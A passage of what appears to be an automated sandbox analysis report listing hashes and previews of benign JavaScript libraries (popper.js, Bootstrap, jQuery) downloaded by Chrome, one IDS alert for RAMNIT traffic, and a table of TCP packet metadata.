                                                                                MD5:6B08DDC901000D51FA1F06A35518F302
                                                                                SHA1:BAFE987C18CBE0587DE3E6360E7DA40A2885614B
                                                                                SHA-256:02835066969199E9924F1332F7172A5D7E552F023A20C3D8BA03BB6C51CE5BE5
                                                                                SHA-512:7A97FA1CF4A12D0F338090F8A4FFAD48D91843D6955304DE5F6208DE394642B0B412D6FD30D7A880CAD92200A8F7F2005C40324BCCE3CFEDA7B14A57DFF098CA
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
                                                                                Preview:/*. Copyright (C) Federico Zivolo 2018. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){if(!e)return document.documentElement;for(var o=ie(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&'BODY'!==i&&'HTM
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (32033)
                                                                                Category:downloaded
                                                                                Size (bytes):37045
                                                                                Entropy (8bit):5.174934618594778
                                                                                Encrypted:false
                                                                                SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                                                MD5:5869C96CC8F19086AEE625D670D741F9
                                                                                SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                                                SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                                                SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js
                                                                                Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (32065)
                                                                                Category:downloaded
                                                                                Size (bytes):85578
                                                                                Entropy (8bit):5.366055229017455
                                                                                Encrypted:false
                                                                                SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (32012)
                                                                                Category:downloaded
                                                                                Size (bytes):69597
                                                                                Entropy (8bit):5.369216080582935
                                                                                Encrypted:false
                                                                                SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (50758)
                                                                                Category:downloaded
                                                                                Size (bytes):51039
                                                                                Entropy (8bit):5.247253437401007
                                                                                Encrypted:false
                                                                                SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (19015)
                                                                                Category:downloaded
                                                                                Size (bytes):19188
                                                                                Entropy (8bit):5.212814407014048
                                                                                Encrypted:false
                                                                                SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:ASCII text, with very long lines (65247)
                                                                                Category:downloaded
                                                                                Size (bytes):69917
                                                                                Entropy (8bit):5.290926894311774
                                                                                Encrypted:false
                                                                                SSDEEP:1536:hLiMgk2gULYoXUmZx6+VWNL0kC8W90qU9JR7hDqEDqWSNB1gZFy/HG+FP:I8w0qU9JTtH3aP
                                                                                MD5:99B0A83CF1B0B1E2CB16041520E87641
                                                                                SHA1:BC5836992C0B260496BA520FE1336D499BF06EB7
                                                                                SHA-256:DDE76B9B2B90D30EB97FC81F06CAA8C338C97B688CEA7D2729C88F529F32FBB1
                                                                                SHA-512:33EA8C2353C745C61C3A927378995A59B555C76249C8F23065AB3CA2BEDD73DECB64EA248EF6E97D1C729A156D9492F28E2177C06CABD0524E0380CB38D2D52F
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                URL:https://code.jquery.com/jquery-3.3.1.slim.min.js
                                                                                Preview:/*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,u=n.push,s=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,d=f.toString,p=d.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},v=function e(t){return null!=t&&t===t.window},y={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in y)n[i]&&(o[i]=n[i]);t.head.a
                                                                                No static file info

                                                                                Download Network PCAP: filteredfull

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                209.94.90.1192.168.2.4443497522023028 10/12/23-17:42:15.880252TCP2023028ET TROJAN RAMNIT.A M144349752209.94.90.1192.168.2.4
                                                                                • Total Packets: 515
                                                                                • 443 (HTTPS)
                                                                                • 80 (HTTP)
                                                                                • 53 (DNS)
                                                                                • 25 (SMTP)
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 12, 2023 17:42:02.090684891 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.090789080 CEST49744443192.168.2.4104.85.244.112
                                                                                Oct 12, 2023 17:42:02.091835976 CEST49744443192.168.2.4104.85.244.112
                                                                                Oct 12, 2023 17:42:02.091849089 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.092192888 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.093360901 CEST49744443192.168.2.4104.85.244.112
                                                                                Oct 12, 2023 17:42:02.138453960 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.176152945 CEST49678443192.168.2.4104.46.162.224
                                                                                Oct 12, 2023 17:42:02.416327953 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.416488886 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.416903973 CEST49744443192.168.2.4104.85.244.112
                                                                                Oct 12, 2023 17:42:02.417376995 CEST49744443192.168.2.4104.85.244.112
                                                                                Oct 12, 2023 17:42:02.417376995 CEST49744443192.168.2.4104.85.244.112
                                                                                Oct 12, 2023 17:42:02.417443037 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:02.417484045 CEST44349744104.85.244.112192.168.2.4
                                                                                Oct 12, 2023 17:42:04.144795895 CEST49675443192.168.2.4173.222.162.32
                                                                                Oct 12, 2023 17:42:09.874092102 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:09.874155045 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:09.874207973 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:09.874516964 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:09.874573946 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:09.874631882 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:09.875339985 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:09.875372887 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:09.875575066 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:09.875595093 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.263166904 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.263693094 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.263719082 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.264430046 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.264599085 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.264651060 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.264998913 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.265065908 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.265075922 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.265131950 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.265635014 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.265678883 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.267529964 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.267599106 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.268131971 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.268197060 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.268558025 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.268573046 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.268773079 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.268779993 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.315519094 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.331139088 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.637094975 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.637284040 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.637373924 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.638078928 CEST49747443192.168.2.4172.217.14.78
                                                                                Oct 12, 2023 17:42:10.638107061 CEST44349747172.217.14.78192.168.2.4
                                                                                Oct 12, 2023 17:42:10.676260948 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.676655054 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:10.676765919 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.678002119 CEST49746443192.168.2.4142.250.188.237
                                                                                Oct 12, 2023 17:42:10.678019047 CEST44349746142.250.188.237192.168.2.4
                                                                                Oct 12, 2023 17:42:12.407870054 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:12.407921076 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:12.407995939 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:12.408793926 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:12.408838034 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:12.408905029 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:12.409331083 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:12.409351110 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:12.409667969 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:12.409687996 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.423844099 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.424393892 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.424422979 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.425937891 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.426038980 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.430695057 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.430835009 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.430998087 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.431010962 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.451657057 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.451987028 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.452029943 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.453572035 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.453677893 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.454649925 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.454768896 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.471250057 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.503778934 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.503812075 CEST44349749217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:13.550896883 CEST49749443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:13.753052950 CEST49675443192.168.2.4173.222.162.32
                                                                                Oct 12, 2023 17:42:14.040209055 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.040245056 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.040338039 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.040719032 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.040738106 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070203066 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070275068 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070297003 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070354939 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.070383072 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070461035 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070468903 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.070468903 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.070472002 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.070532084 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.071125984 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.071171999 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.071218967 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.071230888 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.071259975 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.113187075 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.301934004 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.301980019 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.302047968 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.302575111 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.302587986 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.310966015 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.311058044 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.311146021 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.311676025 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.311711073 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.391987085 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.392014027 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.392147064 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.392157078 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.392239094 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.392342091 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.392360926 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.392400026 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.392442942 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.392447948 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.392498016 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.399327993 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.399580956 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.399632931 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.400547028 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.400650978 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.662216902 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.662590981 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.662647963 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.663880110 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.663980007 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.669771910 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.670013905 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.670077085 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.671561956 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.671678066 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.713495016 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713515043 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713633060 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.713649988 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713726997 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.713735104 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713835955 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.713843107 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713884115 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713913918 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.713927984 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713943005 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.713959932 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.713967085 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.714006901 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.714029074 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.714051008 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.714087963 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.714095116 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:14.714126110 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.757617950 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:14.802915096 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.803167105 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.804686069 CEST49752443192.168.2.4209.94.90.1
